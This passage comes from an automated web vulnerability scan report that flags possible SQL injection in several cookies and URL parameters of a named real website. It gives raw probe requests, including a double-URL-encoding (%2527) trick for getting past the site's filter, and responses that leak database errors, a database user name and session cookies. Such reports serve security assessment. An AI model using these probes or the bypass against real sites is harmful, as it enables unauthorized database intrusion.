Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:09:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1ee73a388da0bb7ec3d7afe3beccac53=93b4d0d3c5817b851bdd0e6edb426ad7; path=/
Last-Modified: Sat, 06 Nov 2010 05:09:15 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 4718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

1.4. http://www.analyticspros.com/administrator/templates/khepri/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /administrator/templates/khepri/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /administrator/templates/khepri%2527/favicon.ico HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/administrator/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 404 Component not found
Date: Sat, 06 Nov 2010 08:26:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 06 Nov 2010 08:26:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<title>404 - Error: 404</title>
...[SNIP]...

Request 2

GET /administrator/templates/khepri%2527%2527/favicon.ico HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/administrator/
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; 7876d45a49f537da76cfb9e129203eee=17d32965e1c37afc808ffaa1ef2087ef; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 08:26:12 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.5. http://www.analyticspros.com/blog.html [__utmmobile cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:17:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:17:52 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:17:52 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30159


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<dt class="error">
...[SNIP]...

Request 2

GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:17:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:17:58 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:17:58 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29889


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.6. http://www.analyticspros.com/blog.html [apros2.0_tpl cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog.html HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0'; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:44:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog.html HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0''; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:44:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.7. http://www.analyticspros.com/blog.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog.html?1'=1 HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:19:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog.html?1''=1 HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:19:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:19:06 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:19:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 28991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.8. http://www.analyticspros.com/blog.html [optimizelyEndUserId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog.html HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:05:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog.html HTTP/1.1
Host: www.analyticspros.com
Proxy-Connection: keep-alive
Referer: http://www.analyticspros.com/about.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; optimizelyEndUserId=oeu1288999536936r0.7062593474984169''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; fpssCookie=true; apros2.0_tpl=apros2.0; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_t=1288999540201%3B1288999540201%3B1288999599844%3B1%3B2; __utmmobile=0xade0ac5896f84b3c; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; __utmb=26076141.10.9.1288999622937

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:05:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.9. http://www.analyticspros.com/blog.html [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The utm_campaign parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_campaign parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA'&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:06:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog.html?utm_source=members-list&utm_medium=email&utm_campaign=monday-QnA''&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:06:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:06:56 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 08:06:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30090


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.10. http://www.analyticspros.com/blog.html [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog.html

Issue detail

The utm_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the utm_source request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog.html?utm_source=members-list%2527&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 08:04:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog.html?utm_source=members-list%2527%2527&utm_medium=email&utm_campaign=monday-QnA&utm_link=main-promo-link HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html
